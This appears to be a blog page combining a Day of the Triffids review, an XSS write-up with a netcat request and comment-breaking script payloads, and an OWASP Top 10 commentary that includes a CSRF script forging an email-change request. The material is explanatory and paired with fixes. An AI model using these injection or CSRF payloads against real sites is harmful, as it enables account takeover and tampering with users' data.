-
When a day that you happen to know is Wednesday starts off by sounding like Sunday, there is something seriously wrong somewhere.
Bill Masen’s day only worsens as he tries to survive the apocalyptic onslaught of ambling, venomous plants.
John Wyndham’s The Day of the Triffids doesn’t feel like an outdated menace even though the book was published in 1951.
It starts as the main character, Bill Masen, awakens in a hospital with his eyes covered in bandages. It’s a great hook that leads into a brief history of the triffids while establishing a sense of unease from the start. The movie 28 Days Later uses an almost identical device to bring both the character and the audience into the action.
I love these sorts of stories. Where Cormac McCarthy’s The Road focuses on the harshness of personal survival and meaning after an apocalypse, Triffids considers how a society might try to emerge from one.
The 1981 BBC series stays very close to the book’s plot and pacing. Read the book first, as the time-capsule aspect of the mini-series might distract you – ’80s hairstyles, clunky control panels, and lens flares.
But if you’re a sci-fi fan who’s been devoted to Doctor Who since the Tom Baker era (or before), you’ll feel right at home in the BBC’s adaptation.
• • • -
Here’s a case where a page has one of the simplest types of XSS vulns: a server echoes the querystring verbatim in the HTTP response. The payload shows up inside an HTML comment labeled “Request Query String”. The site’s developers claim the comment prevents XSS because browsers will not execute JavaScript inside it, as shown below:
```html
<!-- not gonna' happen -->
```
One exploit technique is to close the open comment by starting the payload with “ -->” (space, dash, dash, greater-than). Use netcat to make the raw HTTP request (for some reason, though likely related to the space, the server doubles the payload¹):
```
$ echo -e "GET /nexistepas.cgi? --> HTTP/1.0\r\nHost: vuln.site\r\n" | nc vuln.site 80 | tee response.html
...
<!-- === Request URI: /abc/def/error/404.jsp -->
<!-- === Request Query String: pageType=error&emptyPos=100&isInSecureMode=false& --> --> -->
<!-- === Include URI: /abc/def/cmsTemplates/def_headerInclude_1_v3.jsp -->
...
```
You can confirm this works by viewing the HTML source in Mozilla and watching its syntax highlighting pick up the injected markup (yes, you could just as easily pop an alert window).
The server is clearly vulnerable to XSS because it renders the exact payload. The HTML comments were a poor countermeasure because they could be easily closed by including a few extra characters in the payload. This also shows why I prefer the term HTML injection since it describes the underlying effect more comprehensively.
However, there’s a major problem with practical exploitability: the attack relies on illegal HTTP syntax.² Though the payload works when sent with netcat, a browser applies URL encoding to the payload’s important characters, rendering it ineffective because the payload loses the literal characters necessary to modify the HTML:
```
https://vuln.site/nexistepas.cgi? --><script></script>
...
<!-- === Request URI: /abc/def/error/404.jsp -->
<!-- === Request Query String: pageType=error&emptyPos=100&isInSecureMode=false&%20--%3e%3cscript%3e%3c/script%3e -->
<!-- === Include URI: /abc/def/cmsTemplates/def_headerInclude_1_v3.jsp -->
...
```
I tried Mozilla’s XMLHttpRequest object to see if it might subvert the encoding issue, but didn’t have any luck. Browsers are smart enough to apply URL encoding for all requests, thus defeating this possible trick:
```javascript
var req = new XMLHttpRequest();
req.open('GET', 'https://vuln.site/nexistepas.cgi? --><scri' + 'pt></s' + 'cript>', false);
req.send(null);
...
```
The developers are correct to claim that HTML comments prevent `<script>` tags from being executed, but that has nothing to do with protecting this web site. It’s like saying you can escape Daleks by using the stairs; they’ll just level the building.

The page’s only protection comes from the fact that browsers will always encode the space character. If the page were to decode percent-encoded characters, or if there were a way to make the raw request with a space, then it would be trivially exploited. The real solution for this vuln is to apply HTML encoding or percent encoding to the querystring when it’s written to the page.
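As a sketch of that fix, here’s roughly what the encoding step might look like. This is illustrative JavaScript rather than the site’s actual code (the vulnerable pages are JSP), and the `htmlEncode` and `debugComment` helper names are hypothetical:

```javascript
// Hypothetical helpers for illustration -- the same idea applies in any
// server-side language: encode the querystring before it reaches the page,
// even when it's "only" going into an HTML comment.
function htmlEncode(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

function debugComment(queryString) {
  // The raw payload never lands in the markup as literal characters.
  return '<!-- === Request Query String: ' + htmlEncode(queryString) + ' -->';
}

// A payload of ' --><script></script>' becomes inert text:
// <!-- === Request Query String: pageType=error&amp; --&gt;&lt;script&gt;&lt;/script&gt; -->
```

Percent encoding the value before writing it would work just as well; the point is that the payload’s literal angle brackets and dashes never make it into the response.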
Set aside whether the vuln is exploitable or not. The 404 message in this situation clearly has a bug. Bugs should be fixed.
The time spent arguing over risks, threats, and feasibility far outweighs the time required to create a patch. If the effort of pushing out a few lines of code cripples your development process, then it’s probably a better idea to put more effort into figuring out why the process is broken.
Notice that I didn’t mention the timeline for the patch. The release cycle might require a few days or a few weeks to validate the change. On the other hand, if minor changes cause panic about uptime and require months to test and apply, then you don’t have a good development process – and that’s something far more hazardous to the app’s long-term security.
-
¹ Weird behavior like this is always interesting. Why would the querystring be repeated? What implications does this have for other types of attacks? ↩
-
² Section 5.1 of RFC 2616 specifies that the format of a request line must be as follows (SP indicates a single space character):
Request-Line = Method SP Request-URI SP HTTP-Version CRLF
Including spurious space characters within the request line might elicit errors from the web server and is a worthy test case, but you’ll be hard-pressed to convince a standards-conformant browser to include a space in the URI. ↩
• • • -
-
One curious point about the new 2010 OWASP Top 10 Application Security Risks is that only three of them are rated uncommon. The “Weakness Prevalence” for each of Insecure Cryptographic Storage (A7), Failure to Restrict URL Access (A8), and Unvalidated Redirects and Forwards (A10) is uncommon. That doesn’t mean an uncommon risk can’t be a critical one. These three items highlight the challenge of producing a list of risks that often lack context.
Risk is difficult to quantify. The OWASP Top 10 includes a “What’s My Risk?” section with guidance on how to interpret the list. That guidance is based on the experience of people who perform penetration tests, review code, and research web security.
The Top 10 rates Insecure Cryptographic Storage (A7) as uncommon in prevalence and difficult to detect. One reason it’s hard to detect is that external scanners can’t review datastores, and source code scanners can’t identify these problems beyond flagging misuse of a language’s crypto functions. Thus, one interpretation is that insecure crypto seems uncommon simply because such problems haven’t been discovered yet. Yet not salting a password hash is one of the most egregious mistakes a dev can make, and also one of the easier problems to fix. The practice of salting password hashes has been around since Unix epoch time was in single digits.
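As a sketch of how little code the fix requires, here’s salted hashing with Node’s built-in crypto module. The function names, storage format, and parameter choices are illustrative, not a drop-in recommendation:

```javascript
const crypto = require('crypto');

// Illustrative only: one random salt per password, stored alongside the hash.
function hashPassword(password) {
  const salt = crypto.randomBytes(16);                 // unique, random salt
  const hash = crypto.scryptSync(password, salt, 64);  // slow, memory-hard KDF
  return { salt: salt.toString('hex'), hash: hash.toString('hex') };
}

function verifyPassword(password, record) {
  const salt = Buffer.from(record.salt, 'hex');
  const hash = crypto.scryptSync(password, salt, 64);
  return crypto.timingSafeEqual(hash, Buffer.from(record.hash, 'hex'));
}
```

A dedicated library (bcrypt, scrypt, or similar) is a better choice than rolling your own, but even this much keeps an attacker who steals the datastore from cracking every account with a single precomputed table.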
It’s also interesting that insecure crypto is the only item on the list rated difficult to detect. Conversely, Cross-Site Scripting (A2) is “very widespread” and “easy” to detect. But maybe it’s very widespread because it’s so trivial to find: people might simply choose to search for vulns that require minimal tools and skill to identify. On the other hand, XSS might be very widespread because it’s hard to find in a way that scales to large apps or complex workflows. Of course, this also assumes someone’s looking for it in the first place.
Broken Authentication and Session Management (A3) covers brute force attacks against login pages. It’s an item whose risk is too often demonstrated by real-world attacks. In 2010 the Apache Foundation suffered an attack that relied on brute forcing a password, and Apache’s network had a similar password-related intrusion in 2001. (I mention these because of the clarity of their postmortems, not to insinuate that the Apache Foundation is inherently insecure.) In 2009, another password guesser found happiness with Twitter.
Knowing an account’s password is the best way to steal a user’s data and gain unauthorized access to a site. The only markers of an attacker using valid credentials are behavioral patterns – time of day, duration of activity, geographic source of the connection, and so on. The attacker doesn’t have to use any malicious characters or techniques like those needed for XSS or SQL injection.
The impact of a compromised password is similar to that of CSRF (A5). The nature of a CSRF attack is to force a victim’s browser to make a request to the target app using the context of the victim’s authenticated session. For example, a CSRF attack might change the victim’s password to a value chosen by the attacker, or update the victim’s email address to one owned by the attacker.
By design, browsers make many requests without direct interaction from a user, such as loading images, CSS, JavaScript, and iframes. CSRF requires the victim’s browser to visit a booby-trapped page, but doesn’t require the victim to interact with that page. The target web app neither sees the attacker’s traffic nor even suspects the attacker’s activity because all of the interaction occurs between the victim’s browser and the app.
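For a concrete sense of how little the booby-trapped page needs to do, here’s a sketch of its script. The endpoint and parameter name are hypothetical; the essential point is that the victim’s browser attaches its session cookie to the forged request automatically:

```javascript
// Runs on the attacker's page with no interaction from the victim.
var form = document.createElement('form');
form.method = 'POST';
form.action = 'https://target.site/account/email';  // assumed endpoint
var field = document.createElement('input');
field.type = 'hidden';
field.name = 'newEmail';                             // assumed parameter name
field.value = 'attacker@example.com';
form.appendChild(field);
document.body.appendChild(form);
form.submit();                                       // browser sends the victim's cookies along
```

A GET-based action is even simpler: an img tag pointed at the right URL does the job.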
CSRF serves as a good example of the changing nature of the web security industry. CSRF vulns have existed as long as the web. The attack takes advantage of the fundamental nature of HTML and HTTP whereby browsers automatically load certain types of resources. Importantly, the attack just needs to build a request. It doesn’t need to read a response. It isn’t inhibited by the Same Origin Policy.
CSRF hopped onto the Top 10 list in its 2007 revision, four years after the list’s first appearance. It’s doubtful that CSRF vulns were any more or less prevalent over that four-year period. Its inclusion was due to a better understanding of the vuln and an appreciation of its potential impact. It’s a risk that’s likely to increase when the pool of victims can be measured in the hundreds of millions rather than the hundreds of thousands.
This vuln also highlights an observation bias of appsec. Now that CSRF is in vogue, people start to look for it everywhere. Security conferences get more presentations about advanced ways to exploit it, even though real-world attackers seem content with the success of guessing passwords, seeding web pages with malware, and phishing.
A knowledgeable or dedicated attacker will find a useful exploit. Risk depends on many factors, including Threat Agents (to use the Top 10’s term). Risk increases under a targeted attack – someone actively looking to compromise the app or its users’ data. If you want to add an “Exploitability” metric to your risk estimate, keep in mind that ease of exploitability is often related to the threat agent and tends to be a step function: it might be hard to craft an exploit in the first place, but anyone can run a 42-line Python script that automates the attack.
That’s partially why the Top 10 list should be a starting point for defining security practices for your app, not the end of the road. Even the OWASP site warns readers against using the list for policy rather than awareness. If you’ve been worried about information leakage and improper error handling since 2007, don’t think the problem has disappeared just because it’s not on the list in 2010.
If you’ve been worried about how to build a secure app, don’t rely on the OWASP Top 10 – it’ll tell you weaknesses to avoid, but falls short on patterns to create.
For more about the OWASP Top 10’s history and possible future, check out this article.
• • •